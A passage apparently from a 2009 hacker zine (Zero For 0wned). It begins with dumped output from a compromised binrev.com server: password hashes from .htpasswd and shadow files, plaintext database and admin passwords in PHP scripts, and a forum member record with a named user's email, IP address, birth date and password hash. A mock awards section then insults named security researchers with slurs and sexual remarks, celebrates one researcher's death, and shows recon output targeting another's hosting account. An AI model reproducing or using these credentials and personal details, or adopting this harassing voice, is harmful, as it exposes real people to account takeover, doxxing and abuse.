      inet addr:69.59.25.199  Bcast:69.59.25.207  Mask:255.255.255.240
      UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
      Interrupt:169 Memory:f4000000-f4012100

eth1:6      Link encap:Ethernet  HWaddr 00:15:C5:F3:40:AE
      inet addr:69.59.25.200  Bcast:69.59.25.207  Mask:255.255.255.240
      UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
      Interrupt:169 Memory:f4000000-f4012100

eth1:7      Link encap:Ethernet  HWaddr 00:15:C5:F3:40:AE
      inet addr:69.59.25.201  Bcast:69.59.25.207  Mask:255.255.255.240
      UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
      Interrupt:169 Memory:f4000000-f4012100

eth1:8      Link encap:Ethernet  HWaddr 00:15:C5:F3:40:AE
      inet addr:69.59.25.202  Bcast:69.59.25.207  Mask:255.255.255.240
      UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
      Interrupt:169 Memory:f4000000-f4012100

eth1:9      Link encap:Ethernet  HWaddr 00:15:C5:F3:40:AE
      inet addr:69.59.25.203  Bcast:69.59.25.207  Mask:255.255.255.240
      UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
      Interrupt:169 Memory:f4000000-f4012100

eth1:10   Link encap:Ethernet  HWaddr 00:15:C5:F3:40:AE
      inet addr:69.59.25.204  Bcast:69.59.25.207  Mask:255.255.255.240
      UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
      Interrupt:169 Memory:f4000000-f4012100

eth1:11   Link encap:Ethernet  HWaddr 00:15:C5:F3:40:AE
      inet addr:69.59.25.205  Bcast:69.59.25.207  Mask:255.255.255.240
      UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
      Interrupt:169 Memory:f4000000-f4012100

eth1:12   Link encap:Ethernet  HWaddr 00:15:C5:F3:40:AE
      inet addr:69.59.25.206  Bcast:69.59.25.207  Mask:255.255.255.240
      UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
      Interrupt:169 Memory:f4000000-f4012100

lo      Link encap:Local Loopback
      inet addr:127.0.0.1  Mask:255.0.0.0
      inet6 addr: ::1/128 Scope:Host
      UP LOOPBACK RUNNING  MTU:16436  Metric:1
      RX packets:78844451 errors:0 dropped:0 overruns:0 frame:0
      TX packets:78844451 errors:0 dropped:0 overruns:0 carrier:0
      collisions:0 txqueuelen:0
      RX bytes:836952528 (798.1 MiB)  TX bytes:836952528 (798.1 MiB)

binrev@binrev.com [/home/binrev/.htpasswds]# find . -name passwd | xargs cat
forumsdev:0GYoehds6gxfA
breakmag:L9mc4xoePLmAs
dc16:Yy2zp6WkvVGzo
backupaccess:uRnOpf6CEiOaQ
forumsdev:NyZA4N.lEJXd2

// Mad php codez bellow;

binrev@binrev.com [/home/binrev/public_html/forumbackups]# cat backup.php
<?php

error_reporting(E_ALL);

//Forums backup script
//Created: 2006-01-11 by Nick84


//2 3 * * 1,3,5 cd /home/binrev/public_html/forumbackups;php -q backup.php >
log.txt

//HTTP Access Details
//User: backupaccess
//Pass: dfglkjdfjkgjnn45893asfkjl

$totalbackups = 7;


$beforeforumspath = '../';
$archive_path = 'archive/';
$temp_backupsql = 'sqlbackup.gz';
$temp_backupfiles = 'filebackup.tar.gz';

$backupscriptdir = trim(`pwd`);

$curr_date = date("Y-m-d--H-i-s");



//==Database

//Remove old sql backup file
@unlink($temp_backupsql);
@unlink($temp_backupsql.'.gpg');

//Backup sql database inot gzip
echo `mysqldump --opt -ubinrev_forums -p2427821378a binrev_forums | gzip -c >
$temp_backupsql 2>&1`;

//Copy backup to archive
copy($temp_backupsql, $archive_path.$curr_date.'__sqlbackup.gz');

//Encrypt sql backup
system('gpg --always-trust --homedir ./gpg --recipient "Binrev Backup" --output
"'.$temp_backupsql.'.gpg" --encrypt "'.$temp_backupsql.'" 2>&1');

//Remove temp unencrypted sql backup
//unlink($temp_backupsql);


//==Forum Files

//Remove old files backup file
@unlink($temp_backupfiles);
@unlink($temp_backupfiles.'.gpg');

//Backup files into tar, zip
$command = "cd {$beforeforumspath};tar zcvf
{$backupscriptdir}/{$temp_backupfiles} forums 2>&1";
system($command);

//Copy files backup to archive
copy($temp_backupfiles, $archive_path.$curr_date.'__filebackup.gz');

//Encrypt file backup
system('gpg --always-trust --homedir ./gpg --recipient "Binrev Backup" --output
"'.$temp_backupfiles.'.gpg" --encrypt "'.$temp_backupfiles.'" 2>&1');


//Remove temp unencrypted files backup
//unlink($temp_backupfiles);


//Remove old backup files
removeoldbackups($archive_path);


exit;



function removeoldbackups($dirpath) {
    global $totalbackups;

    $dir = opendir($dirpath);

    while (false !== ($file = readdir($dir))) {
        $localpath = $dirpath.$file;
        if (is_file($localpath)) {
            $key = filemtime($localpath);
            $files_by_date[$key] = $file;
            $files_by_name[] = $file;
        }
    }

    krsort($files_by_date);

    $count = 0;
    foreach ($files_by_date as $file) {
        if ( (strstr($file, 'sqlbackup')) || (strstr($file,
'filebackup')) ) {
            $count++;
            if ($count > $totalbackups*2) {
                unlink($dirpath.$file);
                echo "Deleted:\t$file\n";
            } else {
                echo "Kept:\t$file\n";
            }
        }
    }

}



binrev@binrev.com [/home/binrev/etc/binrev.com]# cat shadow
stankdawg:$1$AzWTzEaz$Dhkdqr89PNsOp9VnjS0n81:::::::
radio:$1$AuV8mt8K$OSONbFXC7lop0fOkfpCbx/:::::::
articles:$1$krZaiSoL$SWyemmjZU8L7FdZUI7N9U/:::::::
hackradio:$1$QyDmunqH$3E9eEwkLG3Reqc4C40Tsu1:::::::
hacktv:$1$QxeuqQ_T$KDc0CHANcSz4T.1qLmAOu/:::::::
hiddenemail:$1$EueWiEri$4EgRrustSf4B.YPqOuXCD1:::::::
letters:$1$1LNcHplH$25/JeLd69V5AeLcUsmdtI1:::::::
mentorship:$1$4QMGM4s2$t7GQRzOii7YTGBPDn0Ks3/:::::::
notes:$1$RdHFQZnQ$YJuPUL5Bl5mmsW796/SuA.:::::::
orders:$1$DseAGOcq$7VNriniDQ3LcFjuhJ6FjK0:::::::
verbal:$1$W7pJ__qZ$7DNncy7i6lzY5bWE6J/PA1:::::::
zer0db:$1$Yenz9B_3$C1bj4MqLlPIvT5mkV0CnQ.:::::::
bitbucket:$1$sMdVgU7L$keEF2Rzu668VDGdwAHhHP1:::::::
forums:$1$UGH__nUD$SSPw.A0K1paLVpC3Dwlu3/:::::::
test:$1$apgTwrxX$PNBSflcz9FcZeyRllLUw4.:::::::
nicktest:$1$Hdn5uWN6$R52GgQKFE2dZHKXgvD8lC.:14025::::::
binrev@binrev.com [/home/binrev/public_ftp/incoming]# ls -al
total 2283164
drwxr-x-wx  3 binrev binrev     4096 Sep 19  2008 ./
drwxr-xr-x  3 binrev binrev     4096 May 10  2007 ../
-rw-r--r--  1 binrev binrev     5955 Nov  3  2006 1.gif
-rw-r--r--  1 binrev binrev   2052096 Sep  7  2006 100_0191.MOV
-rw-r--r--  1 ftp    ftp       104154 Nov 15  2007 772.854
-rw-r--r--  1 binrev binrev 700923904 Jun 10  2006 Electronics\ Episode\ 1.avi
-rw-r--r--  1 binrev binrev 289943556 Jun 11  2006 Electronics\ Episode\ 1.mpg
-rw-r--r--  1 ftp    ftp      4204527 Sep 18  2007 Firefox_wallpaper.png
-rw-r--r--  1 binrev binrev 764922858 Sep  7  2006 Keyboard\ HTVUG.rar
-rw-r--r--  1 binrev binrev 136827484 May 21  2006 Lunar.rar
-rw-r--r--  1 ftp    ftp     56276065 Oct 12  2007
Stankdawg-20070210-150158-full.flac
-rw-r--r--  1 ftp    ftp     28181048 Oct 12  2007
Stankdawg-20070304-192949.flac
-rw-r--r--  1 ftp    ftp     36723629 Oct 12  2007
Stankdawg-20070304-214956.flac
-rw-r--r--  1 ftp    ftp      4241388 Oct 12  2007
Stankdawg-20070513-201723.flac
-rw-r--r--  1 ftp    ftp     51331409 Oct 12  2007
Stankdawg-20070513-203036.flac
-rw-r--r--  1 ftp    ftp    72594 Jan 23  2008 br407-flyer.jpg
-rw-r--r--  1 ftp    ftp    255373723 Aug 21  2007 ddpmeetup.wmv
-rw-r--r--  1 binrev binrev     9274 Aug 13  2006 ex_perl
-rw-r--r--  1 ftp    ftp        4 Jul  3  2007 foo
-rw-r--r--  1 ftp    ftp     1255 Jan 23  2008 g2-unpossible.png
-rw-r--r--  1 ftp    ftp     2048 Jul 16  2008 mini_file.tmp
-rw-r--r--  1 ftp    ftp     1748 Feb 24  2008 ness6653.lnk
-rw-r--r--  1 ftp    ftp      801 Aug 28  2007 os400s
-rw-r--r--  1 binrev binrev   1411036 Oct  2  2006 pwnage.wmv
drwxrwxrwx  2 binrev binrev     4096 Apr  5  2007 radio/
-rw-r--r--  1 ftp    ftp      2718239 Jul 16  2008 test_file.tmp
-rw-r--r--  1 binrev binrev    94500 Apr 24  2006 urkt.zip.png
binrev@binrev.com [/home/binrev/public_html/radio/hackradio/admin/private]# cat
config.php
<?php

error_reporting(E_ALL);

$db_host = 'localhost';
$db_uname = 'binrev_projectus';
$db_pass = 'brproject5559';
$db_dbname = 'binrev_binrevprojects';

//$db_host = 'localhost';
//$db_uname = 'test3';
//$db_pass = '';
//$db_dbname = 'test3';

$db_prefix = 'brr_';
$tbl['schedule'] = 'schedule';
$tbl['fallback'] = 'fallback';
$tbl['feedsched'] = 'feedsched';
$tbl['feedsched_files'] = 'feedsched_files';
$tbl['userlogs'] = 'userlogs';
$tbl['binrev_shows'] = 'binrev_shows';
$tbl['shows_info'] = 'shows_info';

$sch_debug = 1;
$time_to_connect_min = 1;

$dir['binrevradio'] = '\\\\Hdd_server\\server_files\\binrev\\';
$dir['binrevradio'] = '/home/binrev/public_html/radio/archive/';
$dir['binrevradioalt'] =
'/home/binrev/public_html/radio/hackradio/admin/shows/binrevradio/';
$dir['binrevradioalt'] = '/home/binrev/public_ftp/incoming/radio/';

$site_title = 'Binary Revolution Radio';
$admin_password = 'radadmin';

$dir['anonftp'] = '/home/binrev/public_ftp/incoming/radio/';
$dir['uploadedshows'] =
'/home/binrev/public_html/radio/hackradio/admin/shows/';
$dir['downloadedshows'] =
'/home/binrev/public_html/radio/hackradio/admin/showsdl/';

$livedetails['server'] = 'http://www.binrev.com:8000/main';
$livedetails['anonftp'] = 'ftp://www.binrev.com/incoming/radio/';
$livedetails['adminlogin'] = 'http://www.binrev.com:8000/admin/';
$livedetails['status'] = 'http://www.binrev.com:8000/status.xsl';
$livedetails['stream'] = 'http://www.binrev.com/ddp-hr.m3u';

$process['streamer'] = 'icecast';
$process['csstreamer'] = 'ices';

$file['cstreamerplaylist'] =
'/home/binrev/public_html/radio/hackradio/admin/private/playlist.txt';
$file['streamerconf'] =
'/home/binrev/public_html/radio/hackradio/admin/private/icecast.xml';
$file['cstreamerconf'] =
'/home/binrev/public_html/radio/hackradio/admin/private/ices.xml';
$file['wgettemp'] =
'/home/binrev/public_html/radio/hackradio/admin/private/urltowget.txt';

$file['binrev_shows'] = 'binrevshows.htm';
//$file['binrev_shows'] = '/home/binrev/public_html/radio/archive.html';
//$file['binrev_schedule'] = '/home/binrev/public_html/radio/schedule.html';

//$file['binrev_shows'] = '/home/binrev/public_html/Templates/BinRevLay.dwt';
//$file['binrev_schedule'] =
'/home/binrev/public_html/Templates/BinRevLay.dwt';

$file['binrev_shows'] = '/home/binrev/public_html/index.html';
$file['binrev_schedule'] = '/home/binrev/public_html/index.html';

$exec['streamer'] = 'cd /usr/local/bin/;./icecast -c
'.$file['streamerconf'].'&';
$exec['csstreamer'] = 'cd /usr/local/bin/;./ices -c
'.$file['cstreamerconf'].'&';

$url['streamerstatus'] = 'http://www.binrev.com:8000/status.xsl';
$url['binrev_shows'] = 'http://www.binrev.com/radio/archive/';
$url['podcast'] = 'http://www.binrev.com/radio/hackradio/podcast';

$pid['ices'] =
'/home/binrev/public_html/radio/hackradio/admin/private/ices/ices.pid';

$ices['version'] = 'Icecast 2.2.0';

$defaults['bitrate'] = 24;

~#~#~#~#~#~ Do you want hashes? Database dump? Yeah? YEAH! #~#~#~#~#~#


INSERT INTO `ibf_members` (`member_id`, `name`, `member_group_id`, `email`,
`joined`, `ip_address`, `posts`, `title`, `allow_admin_mails`, `time_offset`,
`hide_email`, `email_pm`, `email_full`, `skin`, `warn_level`, `warn_lastwarn`,
`language`, `last_post`, `restrict_post`, `view_sigs`, `view_img`, `view_avs`,
`view_pop`, `bday_day`, `bday_month`, `bday_year`, `msg_count_new`,
`msg_count_total`, `msg_count_reset`, `msg_show_notification`, `misc`,
`last_visit`, `last_activity`, `dst_in_use`, `view_prefs`, `coppa_user`,
`mod_posts`, `auto_track`, `org_perm_id`, `temp_ban`, `login_anonymous`,
`ignored_users`, `mgroup_others`, `member_login_key`,
`member_login_key_expire`, `subs_pkg_chosen`, `has_blog`, `sub_end`,
`members_auto_dst`, `members_cache`, `members_disable_pm`,
`members_display_name`, `members_seo_name`, `members_created_remote`,
`members_editor_choice`, `gallery_perms`, `has_gallery`,
`members_profile_views`, `members_l_display_name`, `members_l_username`,
`failed_logins`, `failed_login_count`, `is_miserable`, `miserable_min`,
`miserable_max`, `miserable_ok`, `miserable_index`, `miserable_to`,
`miserable_nf`, `miserable_red`, `members_pass_hash`, `members_pass_salt`,
`member_banned`, `identity_url`, `member_uploader`, `members_bitoptions`,
`fb_uid`, `fb_emailhash`, `fb_emailallow`, `fb_lastsync`, `members_day_posts`,
`inactive_notified`, `inactive_lastNotified`, `inactive_oldGroup`,
`inactive_moved`, `links`) VALUES

"1";"StankDawg";"5";"StankDawg@stankdawg.com";"1031952765";"68.216.29.69";"7412
";""Diggy"";"0";"-5";"1";"0";"1";"1";"0";"0";"1";"1247976647";"0";"1"
;"1";"1";"0";"24";"9";"1971";"0";"719";"0";"0";NULL;"1247977845";"1248021697";"
0";"-1&-1";"0";"0";"0";",4,";NULL;"1&1";"a:0:{}";",4,";"111fccfe9ca44c65b93e3b7
459241aaf";"1248626497";"0";"1";"0";"1";"a:8:{s:7:\"friends\";a:25:{i:8;s:1:\"1
\";i:13;s:1:\"1\";i:46;s:1:\"1\";i:124;s:1:\"1\";i:214;s:1:\"1\";i:250;s:1:\"1\
";i:290;s:1:\"1\";i:564;s:1:\"1\";i:827;s:1:\"1\";i:1252;s:1:\"1\";i:1495;s:1:\
"1\";i:1723;s:1:\"1\";i:1741;s:1:\"1\";i:1828;s:1:\"1\";i:1961;s:1:\"1\";i:1970
;s:1:\"1\";i:2303;s:1:\"1\";i:2327;s:1:\"1\";i:5987;s:1:\"1\";i:6257;s:1:\"1\";
i:6465;s:1:\"1\";i:7992;s:1:\"1\";i:8080;s:1:\"1\";i:9783;s:1:\"1\";i:17001;s:1
:\"1\";}s:7:\"my_blog\";s:1:\"1\";s:11:\"report_temp\";a:0:{}s:19:\"report_last
_updated\";i:1247936325;s:10:\"report_num\";s:1:\"0\";s:10:\"rc_rss_key\";s:32:
\"f61a9a79bcfa6def790f91f4f724dfda\";s:7:\"gb_mark\";i:1248021964;s:5:\"stats\"
;a:11:{s:11:\"postsByTime\";a:24:{i:0;a:2:{s:4:\"hour\";s:1:\"0\";s:12:\"postsP
ercent\";d:70;}i:1;a:2:{s:4:\"hour\";s:1:\"1\";s:12:\"postsPercent\";d:50;}i:2;
a:2:{s:4:\"hour\";s:1:\"2\";s:12:\"postsPercent\";d:22;}i:3;a:2:{s:4:\"hour\";s
:1:\"3\";s:12:\"postsPercent\";d:7;}i:4;a:2:{s:4:\"hour\";s:1:\"4\";s:12:\"post
sPercent\";d:4;}i:5;a:2:{s:4:\"hour\";s:1:\"5\";s:12:\"postsPercent\";d:0;}i:6;
a:2:{s:4:\"hour\";s:1:\"6\";s:12:\"postsPercent\";d:0;}i:7;a:2:{s:4:\"hour\";s:
1:\"7\";s:12:\"postsPercent\";d:5;}i:8;a:2:{s:4:\"hour\";s:1:\"8\";s:12:\"posts
Percent\";d:15;}i:9;a:2:{s:4:\"hour\";s:1:\"9\";s:12:\"postsPercent\";d:43;}i:1
0;a:2:{s:4:\"hour\";s:2:\"10\";s:12:\"postsPercent\";d:36;}i:11;a:2:{s:4:\"hour
\";s:2:\"11\";s:12:\"postsPercent\";d:31;}i:12;a:2:{s:4:\"hour\";s:2:\"12\";s:1
2:\"postsPercent\";d:36;}i:13;a:2:{s:4:\"hour\";s:2:\"13\";s:12:\"postsPercent\
";d:52;}i:14;a:2:{s:4:\"hour\";s:2:\"14\";s:12:\"postsPercent\";d:58;}i:15;a:2:
{s:4:\"hour\";s:2:\"15\";s:12:\"postsPercent\";d:52;}i:16;a:2:{s:4:\"hour\";s:2
:\"16\";s:12:\"postsPercent\";d:48;}i:17;a:2:{s:4:\"hour\";s:2:\"17\";s:12:\"po
stsPercent\";d:65;}i:18;a:2:{s:4:\"hour\";s:2:\"18\";s:12:\"postsPercent\";d:67
;}i:19;a:2:{s:4:\"hour\";s:2:\"19\";s:12:\"postsPercent\";d:75;}i:20;a:2:{s:4:\
"hour\";s:2:\"20\";s:12:\"postsPercent\";d:69;}i:21;a:2:{s:4:\"hour\";s:2:\"21\
";s:12:\"postsPercent\";d:74;}i:22;a:2:{s:4:\"hour\";s:2:\"22\";s:12:\"postsPer
cent\";d:100;}i:23;a:2:{s:4:\"hour\";s:2:\"23\";s:12:\"postsPercent\";d:91;}}s:
17:\"membersTotalPosts\";i:9428;s:13:\"popularBoards\";a:10:{i:14;a:4:{s:2:\"id
\";s:2:\"14\";s:5:\"posts\";s:4:\"2012\";s:12:\"postsPercent\";d:21;s:10:\"tota
lPosts\";i:95805;}i:20;a:4:{s:2:\"id\";s:2:\"20\";s:5:\"posts\";s:4:\"1741\";s:
12:\"postsPercent\";d:18;s:10:\"totalPosts\";i:5097;}i:2;a:4:{s:2:\"id\";s:1:\"
2\";s:5:\"posts\";s:4:\"1537\";s:12:\"postsPercent\";d:16;s:10:\"totalPosts\";i
:52188;}i:30;a:4:{s:2:\"id\";s:2:\"30\";s:5:\"posts\";s:4:\"1477\";s:12:\"posts
Percent\";d:16;s:10:\"totalPosts\";i:6788;}i:22;a:4:{s:2:\"id\";s:2:\"22\";s:5:
\"posts\";s:3:\"521\";s:12:\"postsPercent\";d:6;s:10:\"totalPosts\";i:9804;}i:4
;a:4:{s:2:\"id\";s:1:\"4\";s:5:\"posts\";s:3:\"495\";s:12:\"postsPercent\";d:5;
s:10:\"totalPosts\";i:48930;}i:5;a:4:{s:2:\"id\";s:1:\"5\";s:5:\"posts\";s:3:\"
280\";s:12:\"postsPercent\";d:3;s:10:\"totalPosts\";i:14922;}i:55;a:4:{s:2:\"id
\";s:2:\"55\";s:5:\"posts\";s:3:\"216\";s:12:\"postsPercent\";d:2;s:10:\"totalP
osts\";i:1269;}i:19;a:4:{s:2:\"id\";s:2:\"19\";s:5:\"posts\";s:3:\"202\";s:12:\
"postsPercent\";d:2;s:10:\"totalPosts\";i:14642;}i:21;a:4:{s:2:\"id\";s:2:\"21\
";s:5:\"posts\";s:3:\"153\";s:12:\"postsPercent\";d:2;s:10:\"totalPosts\";i:412
52;}}s:26:\"postsByHour-forumGenerated\";i:1247984980;s:29:\"postsByHour-forumT
imeFormated\";a:14:{i:0;i:1247984980;s:7:\"seconds\";s:2:\"40\";s:7:\"minutes\"
;s:2:\"29\";s:5:\"hours\";s:2:\"06\";s:4:\"mday\";s:2:\"19\";s:4:\"wday\";s:1:\
"7\";s:3:\"mon\";s:2:\"07\";s:4:\"year\";s:4:\"2009\";s:4:\"yday\";s:3:\"200\";
s:7:\"weekday\";s:6:\"Sunday\";s:5:\"month\";s:4:\"July\";s:4:\"week\";s:2:\"28
\";s:6:\"smonth\";s:3:\"Jul\";s:4:\"smon\";s:3:\"Jul\";}s:8:\"numPosts\";s:5:\"
9,428\";s:9:\"numTopics\";s:5:\"1,569\";s:8:\"numPolls\";s:2:\"24\";s:8:\"numVo
tes\";s:3:\"197\";s:21:\"generalStatsGenerated\";i:1247984980;s:24:\"generalSta
tsTimeFormated\";a:14:{i:0;i:1247984980;s:7:\"seconds\";s:2:\"40\";s:7:\"minute
s\";s:2:\"29\";s:5:\"hours\";s:2:\"06\";s:4:\"mday\";s:2:\"19\";s:4:\"wday\";s:
1:\"7\";s:3:\"mon\";s:2:\"07\";s:4:\"year\";s:4:\"2009\";s:4:\"yday\";s:3:\"200
\";s:7:\"weekday\";s:6:\"Sunday\";s:5:\"month\";s:4:\"July\";s:4:\"week\";s:2:\
"28\";s:6:\"smonth\";s:3:\"Jul\";s:4:\"smon\";s:3:\"Jul\";}}}";"0";"StankDawg";
"stankdawg";"0";"std";"1:1:1";"1";"14405";"stankdawg";"stankdawg";;"0";"0";"10"
;"30";"10";"35";"25";"30";"30";"22bc1aad095bad120f9463ff8294a3c4";"xE(#w";"0";N
ULL;"default";"0";"0";;"0";"0";"5,1247935975";"0";"0";"0";"0";"12"

Okay that's all you're getting. No room. 

StankDawg is the only moron at binrev that we really feel like embarassing. He
also has one of the lamest and most excessive wikipedia pages around. I can't
believe Ptacek put so much time in trying to remove StankDawg's wikipedia page,
but at least tqbf is 100% right. 

Probably the discussion page comment most worthy of a chuckle comes right at
the top.

    Why does this attention whore get a page all to himself? And how has he
affected the hacking scene that greatly? He seems like a new age n00b to me.
 (Anonymous comment posted 19:43, September 5, 2005 by 70.67.163.34)

    Those who can, do. Those who can\'t, cry \"n00b\". --Jscott 17:15, 23
September 2005 (UTC)

No, those who can't spend the rest of their lives harvesting text files of
those who can, and talking about the same shit every year at the same
conferences. Hey, are any radical hacker zines on textfiles.com yet?

Will someone please egg Jason Scott?



                                           |
                                       \       /            _\/_
     Pwnie awards                        .-'-.              //o\  _\/_
                                    --  /     \  --           |   /o\\
  ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~`
                                                                    |


So, once again we find ourselves at that time. As I'm sure you've all been 
awaiting eagerly I'll just get right to the point: it's time for the 
annual Zero For 0wned pwnie awards!

We had so many people that were deserving of awards in so many categories
that we could go on for days. But that wouldn't be fair to you, the reader,
so we've just brought you the best of the best for your viewing pleasure.

Winners can send an acceptance speech to full-disclosure@lists.grok.org.uk. 
Speaking of, none of last year's winners sent us a single acceptance speech! 
Not a single one! So fuck all those guys, they're all a bunch of bitches
anyways.

And now, our first category:

1. Biggest "Internet killing" bug (aka bug that was hyped _way_ too much)

Yeah, this category is all the rage now. Dan Kaminsky started it off with his 
DNS bullshit, and then Anton Kapela and Alex Pilosov did BGP, and then there was 
that TCP timing attack by Robert E. Lee and Jack Louis of Outpost24, along with
a few other attempts by some lame researchers to cash in on the trend. 
Oh, these crazy times we live in! Since we here at ZF0 feel that Phrack 
is past its prime and that gay bloggers are gay bloggers, ithilgore and 
RSnake will *not* be considered for this award. Sorry Bobby, but I'm sure 
that Grossman will be more than happy to suck your dick and make you feel 
better. 

Anyways, I'm going to have to give this one to the Outpost24 guys. This is the
first time in recent memory that the entire "security community" had been 
working hard to figure out a DoS attack. So congrats guys, I'm sure the DDoS
kiddies love you too. BTW, does anyone else think it's odd how shortly before
they were set to go public Jack Louis' house catches on fire and he dies of
smoke inhilation? Whoever did that I owe you a beer.

2. Least trustworthy whitehats

Well, discounting the fact that the entire security industry is a corrupt piece
of shit, we're going to have to give this award to Matasano. I mean really guys?
Posting the details of Dan's "Internet killing" DNS vulenrability before his
0day dropping talk? Not cool. I'm not sure how clients can trust you anymore.
Oh, and Halvar, you weren't supposed to be speculating on what the vuln was
in a public forum. Way to be a dick and not listen to the wishes of some 
fat loser who hits himself (we love you Danny). Matasano gets extra
untrustworthy points for having dirty security practices on their server and
getting pwnt. That shouldn't be good for business.

3. Best blog

This is a very prestigious award and sought after award. The winner of this
award not only has to have good technical knowledge and literary skills, but
they need to be active enough to keep me coming back. Last year Matasano took
this award home (and never sent us an acceptance speech!) but this year it goes
hands down to xorl. xorl is a greek chap who runs xorl.wordpress.com, which is
good EVEN if sometimes he lazes out and pulls up a little short on analysis.
Hey, if it's good enough for Dave Aitel it's good enough for me! Speaking of 
Mr. Aitel...

4. Biggest fail

There's a lot of people who nominated themselves for this award, but I figured
what the fuck, I can give this to whomever I please so I decided to go with
Dave Aitel here. Why Dave do you ask? Well, let me take you back to last year...

The date is August 6th, 2008. The location is Las Vegas Nevada, USA. The event
is none other than the crazy overpriced Blackhat USA conference. Yeah, it's
the *other* pwnie awards, you might have heard of them.

That night Dave Aitel presented an award for Mass 0wnage. Appropriately enough,
he mentioned our zine. However, he for the fucking name wrong. It's Z-*F*-0,
Dave. NOT Z-*D*-0. The 'F' is for 'For'. The only other retard to call us 'ZD0'
was Robert Lemos, and we all know how intelligent that chap is. So yeah, Dave,
we expect a full handwritten apology letter, a full subscription to CANVAS, 
and naked pics of your wife Justine (hey, first rule of pr0j3kt m4yh3m as 
according to ~el8; get their friends/family. We love you Dave. Really.).  You 
put yourself in a class with only one other man: Robert Lemos. 

That cannot feel good. You can blame him and try to pass this on if you want,
but then you have to at least admit that you read Lemos' work. It's lose-lose.

5. Biggest masturbator 

Once again, we've decided to present this award. For those of you who failed to
tune in to our awards last time, this is one of the biggest honors a person can
achieve, as it means they will *NEVER* have a sex life as they're too busy 
hacking the living shit out of computers 24/7. Last year we had a few people
who unintentionally nominated themselves. This year the nominees were pretty 
much the same, as only 1% of all "security professionals" actually do good
research, and the other 99% are complete retards who use Nessus as a baseline.

But we here at the Official Zero For 0wned Pwnie Awards Nomination And 
Assignment Commission (ZF0PANAC -- pronounced "ZF0 panic") feel that 
there's only one person who actually deserves this award, so without further ado
the award for biggest masturbator goes to Felix Linder (better known as FX)!

For those of you who missed it, FX gave a talk at CCC about generalizing Cisco
IOS explotation techniques across multiple IOS versions. It was actually
interesting enough that I sat through the whole thing. Congrats FX. 

6. Biggest mailing list troll

With n3td3v off FD I was starting to get concerned with who would be keeping
up the long and valued Internet tradition of relentlessly trolling various
public discussion groups. Luckily, I didn't have long to worry as this fine
(alleged) woman was kind enough to step up and take on this responsibility
herself. Yes, I'm speaking of none other than Joanna Rutkowska. You may know
of him^H^Her from the Bluepill hype and all the other VM and hypervisor talks 
and papers (s)he releases a few times annually. If not, well, you're not 
missing much. The beauty of the situation is that most of the time, Joanna 
doesn't even seem to realize that she's trolling lists like Daily Dave until
someone (who happens to have real talent) like Halvar Flake comes along and 
tells her to shut the fuck up. So, Joanna, this one's for you. 

Oh, and Joanna, we wanted to not only give you an award, but also leave you with
this to think about:

$ uname -a
Linux heze.lunarpages.com 2.6.9-78.0.22.ELsmp #1 SMP Thu Apr 30 19:14:39 EDT 
2009 i686 i686 i386 GNU/Linux
$ grep invisi /etc/passwd
invisi6:x:32181:32182::/home/invisi6:/usr/local/cpanel/bin/noshell
$ host invisiblethingslab.com
invisiblethingslab.com has address 216.97.235.20
$ /sbin/ifconfig | grep 216.97.235.20 | head -n 1
          inet addr:216.97.235.20  Bcast:216.97.235.255  Mask:255.255.255.0

[DIR] WysiwygPro/             10-May-2006 04:07      -  
[TXT] about.html              18-Jul-2008 04:02     3k  
[TXT] blog.html               07-May-2006 13:34     2k  
[DIR] bluepillproject/        13-Oct-2008 20:23      -  
[DIR] cgi-bin/                27-Aug-2005 02:10      -  
[TXT] code.html               18-Jul-2008 04:03     6k  
[TXT] contact.html            18-Jul-2008 04:03     2k  
[TXT] events.html             18-Jul-2008 04:11    23k  
[DIR] gallery/                17-May-2006 02:36      -  
[DIR] images/                 18-Jul-2008 04:03      -  
[TXT] index.html              18-Jul-2008 04:02     5k  
[DIR] invisiblethingslab/     17-Jul-2009 07:41      -  
[DIR] itl_ftp/                26-Nov-2008 11:52      -  
[TXT] joanna.asc              12-Feb-2008 12:57     4k  
[TXT] newsarchive.html        10-May-2006 10:10     8k  
[TXT] papers.html             18-Jul-2008 04:03    18k  
[DIR] papers/                 04-Jan-2009 13:50      -  
[DIR] priv/                   12-Aug-2007 07:11      -  
[DIR] pub/                    05-Feb-2008 07:32      -  
[TXT] robots.txt              04-Mar-2008 07:27     1k  
[TXT] speaking.html           18-Jul-2008 04:06     5k  
[TXT] style.css               18-Jul-2008 04:03     4k  
[DIR] tools/                  04-Mar-2008 07:29      -  

We sincerely hope you enjoy it, Joanna!

Anyways, that's all for tonight folks. Enjoy the rest of the production we have
for you, and have a good day.



                                           |
                                       \       /            _\/_
   hak5                                  .-'-.              //o\  _\/_
                                    --  /     \  --           |   /o\\
  ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~`
                                                                    |
  I see a white hat and I want to paint it black...
  They tried to kill our scene but we just stood and laughed...

  I see the white hats giving talks and talking shit....
  Every time I hear them talk it makes me want to spit....

  This world has grown too big it's time to cut the slack....
  We took a break to hack your shit but now we're back....

  I see them tellin' everyone they're so sercure....
  What they don't tell you is that we've owned them all before....

  I look inside myself and see my heart is black....
  I see that white hat only now it's painted black....

  Maybe now you'll fade away and finally face the facts....
  It's not easy fessin up when your whole world is black....

  No more can we sit by and watch this happen here....
  It's time to let you know that judgement day is near....

  I see a white hat and I want to paint it black...
  No whites or greys no more i want them to turn black....

  I look inside myself and see my heart is black....
  I see that white hat only now it's painted black....

  I wanna see it painted, painted black
  Black as night, black as coal
  I wanna see the sun blotted out from the sky
  I wanna see it painted, painted, painted, painted black


---- owned+rm5 -----

*  Please note this exploit is released to you under fuqHAK5 licence agreement, you may use
*  this exploit, sell it, recode it, rip the header and claim it as your own on the condition
*  that you are not a fan of the hak5 tv "hacking" show. This exploit must not be renamed from
*  shoryuken.c at any time.

[ Snippet from prdelka's latest leakage. Still exploiting public bugs in 2009. ]

So who are Hak5?

"Put together by a band of IT ninjas, security professionals and hardcore
gamers, Hak5 isn't your typical tech show. We take on hacking in the old-school
